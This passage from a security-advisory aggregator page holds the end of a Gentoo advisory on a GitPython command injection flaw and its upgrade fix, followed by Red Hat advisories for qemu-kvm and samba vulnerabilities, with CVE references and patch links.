improper user input validation, which makes it possible to inject a  
maliciously crafted remote URL into the clone command. Exploiting this  
vulnerability is possible because the library makes external calls to  
git without sufficient sanitization of input arguments.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GitPython users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/GitPython-3.1.30"

References  
==========

[ 1 ] CVE-2022-24439  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24439

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-01

Red Hat Security Advisory 2023-6227-01 - An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6227.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: qemu-kvm security updateAdvisory ID:        RHSA-2023:6227-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6227Issue date:         2023-11-01Revision:           01CVE Names:          CVE-2023-3354====================================================================Summary: An update for qemu-kvm is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kernel-based Virtual Machine (KVM) is a full virtualization solution for Linux on a variety of architectures. The qemu-kvm packages provide the user-space component for running virtual machines that use KVM.Security Fix(es):* QEMU: VNC: improper I/O watch removal in TLS handshake can lead to remote unauthenticated denial of service (CVE-2023-3354)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3354References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2023-6227-01

Red Hat Security Advisory 2023-6209-01 - An update for samba is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_6209.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: samba security updateAdvisory ID:        RHSA-2023:6209-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:6209Issue date:         2023-10-31Revision:           01CVE Names:          CVE-2023-3961====================================================================Summary: An update for samba is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Samba is an open-source implementation of the Server Message Block (SMB) protocol and the related Common Internet File System (CIFS) protocol, which allow PC-compatible machines to share files, printers, and various information.Security Fix(es):* samba: smbd allows client access to unix domain sockets on the file system as root (CVE-2023-3961)* samba: SMB clients can truncate files with read-only permissions (CVE-2023-4091)* samba: \"rpcecho\" development server allows denial of service via sleep() call on AD DC (CVE-2023-42669)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3961References:https://access.redhat.com/security/updates/classification/#moderate

Tag

#mac